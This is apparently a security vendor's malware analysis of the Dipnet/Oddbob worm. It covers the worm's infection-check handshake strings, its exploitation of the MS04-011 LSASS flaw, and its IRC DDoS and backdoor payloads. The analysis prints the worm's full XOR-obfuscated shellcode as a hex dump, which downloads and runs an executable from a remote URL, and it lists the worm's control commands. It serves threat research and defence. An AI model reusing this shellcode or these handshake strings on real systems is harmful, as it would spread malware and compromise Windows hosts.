Research

Dipnet/Oddbob Worm Analysis

Dipnet (or Oddbob) is a worm that spreads using the well-known MS04-011 vulnerability that Sasser was based on. Its purpose is to spread an IRC DDoS bot. Later variants of Dipnet are causing some interest due to unusual traffic patterns onTCP port 11768 (and later on TCP port 15118).

Analysis

Before Dipnet exploits a host, it first attempts to connect to that host on a chosen TCP port (11768 or 15118) and sends the string "__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123". If the host is already infected by Dipnet, it will respond with a specific response encoded in the body of the worm. The latest variant we've seen responds with "__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3", then closes the connection. This exchange allows the worm to avoid infecting hosts that are already running the latest version of the worm software.

If the worm ascertains that the host is not already infected, or is not running the latest version, it will then attempt to exploit the LSASS vulnerability on TCP port 445. The shellcode of the exploit is self-decrypting, with the bulk of the code XORed by 0xFF in order to obfuscate the payload strings and prevent null bytes from prematurely terminating the payload while being copied in memory by the affected host. When decrypted, the shellcode continues running and downloads the worm executable from a remote webserver and runs it.

The shellcode as received is as follows: 

00000000  eb 00 06 00 eb 00 06 00  9b 00 2a 00 f9 00 77 00  |ë...ë.....*.ù.w.|
00000010  90 00 90 00 90 00 90 00  90 00 90 00 90 00 90 00  |................|
00000020  90 00 33 00 c0 00 f7 00  d0 00 8b 00 fb 00 f2 00  |..3.À.÷.Ð...û.ò.|
00000030  af 00 57 00 33 00 c9 00  b1 00 b2 00 90 00 90 00  |¯.W.3.É.±.².....|
00000040  90 00 90 00 80 00 37 00  ff 00 47 00 e2 00 fa 00  |......7.ÿ.G.â.ú.|
00000050  8b 00 ef 00 4d 00 5f 00  57 00 b8 00 30 00 fa 00  |..ï.M._.W.¸.0.ú.|
00000060  b0 00 83 00 f7 00 d0 00  ff 00 d0 00 8b 00 d8 00  |°...÷.Ð.ÿ.Ð...Ø.|
00000070  be 00 f8 00 ff 00 ff 00  ff 00 f7 00 d6 00 33 00  |¾.ø.ÿ.ÿ.ÿ.÷.Ö.3.|
00000080  c0 00 8b 00 c8 00 f7 00  d1 00 f2 00 ae 00 57 00  |À...È.÷.Ñ.ò.®.W.|
00000090  53 00 b8 00 56 00 19 00  b1 00 83 00 f7 00 d0 00  |S.¸.V...±...÷.Ð.|
000000a0  ff 00 d0 00 3e 00 89 00  44 00 b5 00 fd 00 4e 00  |ÿ.Ð.>...D.µ.ý.N.|
000000b0  0b 00 f6 00 75 00 e3 00  33 00 c0 00 8b 00 c8 00  |..ö.u.ã.3.À...È.|
000000c0  f7 00 d1 00 f2 00 ae 00  57 00 b8 00 30 00 fa 00  |÷.Ñ.ò.®.W.¸.0.ú.|
000000d0  b0 00 83 00 f7 00 d0 00  ff 00 d0 00 8b 00 d8 00  |°...÷.Ð.ÿ.Ð...Ø.|
000000e0  be 00 f5 00 ff 00 ff 00  ff 00 f7 00 d6 00 ba 00  |¾.õ.ÿ.ÿ.ÿ.÷.Ö.º.|
000000f0  f8 00 ff 00 ff 00 ff 00  f7 00 d2 00 52 00 33 00  |ø.ÿ.ÿ.ÿ.÷.Ò.R.3.|
00000100  c0 00 8b 00 c8 00 f7 00  d1 00 f2 00 ae 00 57 00  |À...È.÷.Ñ.ò.®.W.|
00000110  53 00 b8 00 56 00 19 00  b1 00 83 00 f7 00 d0 00  |S.¸.V...±...÷.Ð.|
00000120  ff 00 d0 00 3e 00 89 00  44 00 b5 00 fd 00 5a 00  |ÿ.Ð.>...D.µ.ý.Z.|
00000130  52 00 4e 00 3b 00 f2 00  75 00 e1 00 33 00 c0 00  |R.N.;.ò.u.á.3.À.|
00000140  8b 00 c8 00 f7 00 d1 00  f2 00 ae 00 90 00 90 00  |..È.÷.Ñ.ò.®.....|
00000150  33 00 c0 00 66 00 48 00  d1 00 e0 00 33 00 d2 00  |3.À.f.H.Ñ.à.3.Ò.|
00000160  50 00 52 00 ff 00 55 00  01 00 8b 00 f0 00 33 00  |P.R.ÿ.U.....ð.3.|
00000170  d2 00 52 00 52 00 52 00  52 00 57 00 ff 00 55 00  |Ò.R.R.R.R.W.ÿ.U.|
00000180  25 00 33 00 d2 00 52 00  52 00 52 00 52 00 8b 00  |%.3.Ò.R.R.R.R...|
00000190  d7 00 90 00 90 00 90 00  52 00 50 00 ff 00 55 00  |×.......R.P.ÿ.U.|
000001a0  21 00 57 00 33 00 d2 00  66 00 4a 00 d1 00 e2 00  |!.W.3.Ò.f.J.Ñ.â.|
000001b0  52 00 56 00 50 00 ff 00  55 00 1d 00 90 00 90 00  |R.V.P.ÿ.U.......|
000001c0  90 00 33 00 d2 00 52 00  b8 00 f4 00 ff 00 ff 00  |..3.Ò.R.¸.ô.ÿ.ÿ.|
000001d0  ff 00 f7 00 d0 00 8b 00  d5 00 2b 00 d0 00 42 00  |ÿ.÷.Ð...Õ.+.Ð.B.|
000001e0  90 00 90 00 52 00 ff 00  55 00 19 00 ff 00 37 00  |....R.ÿ.U...ÿ.7.|
000001f0  56 00 50 00 8b 00 d8 00  ff 00 55 00 15 00 53 00  |V.P...Ø.ÿ.U...S.|
00000200  ff 00 55 00 11 00 90 00  90 00 90 00 90 00 90 00  |ÿ.U.............|
00000210  33 00 d2 00 42 00 52 00  b8 00 f4 00 ff 00 ff 00  |3.Ò.B.R.¸.ô.ÿ.ÿ.|
00000220  ff 00 f7 00 d0 00 8b 00  d5 00 2b 00 d0 00 42 00  |ÿ.÷.Ð...Õ.+.Ð.B.|
00000230  90 00 90 00 90 00 52 00  ff 00 55 00 09 00 90 00  |......R.ÿ.U.....|
00000240  33 00 d2 00 f7 00 d2 00  c1 00 e2 00 04 00 52 00  |3.Ò.÷.Ò.Á.â...R.|
00000250  ff 00 55 00 05 00 eb 00  f3 00 90 00 87 00 db 00  |ÿ.U...ë.ó.....Û.|
00000260  ff 00 ff 00 ff 00 ff 00  b4 00 ba 00 ad 00 b1 00  |ÿ.ÿ.ÿ.ÿ.´.º.­.±.|
00000270  ba 00 b3 00 cc 00 cd 00  d1 00 bb 00 b3 00 b3 00  |º.³.Ì.Í.Ñ.».³.³.|
00000280  ff 00 a0 00 93 00 9c 00  8d 00 9a 00 9e 00 8b 00  |ÿ. .............|
00000290  ff 00 a0 00 93 00 88 00  8d 00 96 00 8b 00 9a 00  |ÿ. .............|
000002a0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00  |ÿ. .............|
000002b0  ff 00 a0 00 93 00 9c 00  93 00 90 00 8c 00 9a 00  |ÿ. .............|
000002c0  ff 00 a8 00 96 00 91 00  ba 00 87 00 9a 00 9c 00  |ÿ.¨.....º.......|
000002d0  ff 00 ac 00 93 00 9a 00  9a 00 8f 00 ff 00 b8 00  |ÿ.¬.........ÿ.¸.|
000002e0  93 00 90 00 9d 00 9e 00  93 00 be 00 93 00 93 00  |..........¾.....|
000002f0  90 00 9c 00 ff 00 a8 00  b6 00 b1 00 b6 00 b1 00  |....ÿ.¨.¶.±.¶.±.|
00000300  ba 00 ab 00 d1 00 bb 00  b3 00 b3 00 ff 00 b6 00  |º.«.Ñ.».³.³.ÿ.¶.|
00000310  91 00 8b 00 9a 00 8d 00  91 00 9a 00 8b 00 b0 00  |..............°.|
00000320  8f 00 9a 00 91 00 be 00  ff 00 b6 00 91 00 8b 00  |......¾.ÿ.¶.....|
00000330  9a 00 8d 00 91 00 9a 00  8b 00 b0 00 8f 00 9a 00  |..........°.....|
00000340  91 00 aa 00 8d 00 93 00  be 00 ff 00 b6 00 91 00  |..ª.....¾.ÿ.¶...|
00000350  8b 00 9a 00 8d 00 91 00  9a 00 8b 00 ad 00 9a 00  |............­...|
00000360  9e 00 9b 00 b9 00 96 00  93 00 9a 00 ff 00 97 00  |....¹.......ÿ...|
00000370  8b 00 8b 00 8f 00 c5 00  d0 00 d0 00 9e 00 8b 00  |......Å.Ð.Ð.....|
00000380  93 00 9e 00 91 00 8b 00  9c 00 90 00 92 00 92 00  |................|
00000390  9a 00 8d 00 9c 00 9a 00  d1 00 9c 00 90 00 92 00  |........Ñ.......|
000003a0  d0 00 8c 00 8b 00 8a 00  99 00 99 00 d1 00 9a 00  |Ð...........Ñ...|
000003b0  87 00 9a 00 ff 00 88 00  96 00 91 00 9c 00 9a 00  |....ÿ...........|
000003c0  8d 00 d1 00 9a 00 87 00  9a 00 ff 00 88 00 88 00  |..Ñ.......ÿ.....|
000003d0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
000003e0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
000003f0  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
00000400  88 00 88 00 88 00 88 00  88 00 88 00 88 00 88 00  |................|
00000410  88 00 88 00 88 00 88 00  88 00 88 00 ff 00        |............ÿ.|

The shellcode uses InternetOpenA and WinExec Windows API calls to download and execute a file from a URL. This particular shellcode downloads the file from:

http://atl<blocked>rce.com/stuff.exe

The worm executable sets up its own listener on the specified port in order to communicate with future instances of the worm that may attempt to exploit the host. It also communicates with two different websites in order to receive additional commands. Commands can be one of the following: 

DIE:            delete worm registry keys and exit
DOWNLOAD:       download a file via HTTP
EXEC:           execute a file
RESET:          restart the scanner with a new batch of IP address masks
APPEND:         insert additional IP address masks to scan

The first website provides the worm with a list of IP address ranges to scan and exploit. The second website provides the worm with other malware to download and execute. Finally, the worm begins to scan and exploit additional hosts based on the IP address masks given.

At the time of this writing, two additional executables were being served up by the control websites. One is an IRC DDoS bot identified as Backdoor.Win32.IRCBot.k, the other is a backdoor with a kernel-level driver that hides the process, known as Backdoor.Win32.Masteseq.

The DDoS bot connects to a channel on a private IRC server in Russia. At the time of this writing the channel had accumulated between 2800 and 2900 infected hosts.

Next Steps
Start With SecureWorks Request More Information Now
Call SecureWorks Call Us Today
877-905-6661

Subscribe to the On the Radar Newsletter